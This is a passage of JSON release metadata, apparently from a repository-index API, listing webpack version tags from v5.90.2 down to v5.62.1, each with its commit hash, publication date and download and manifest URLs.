8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/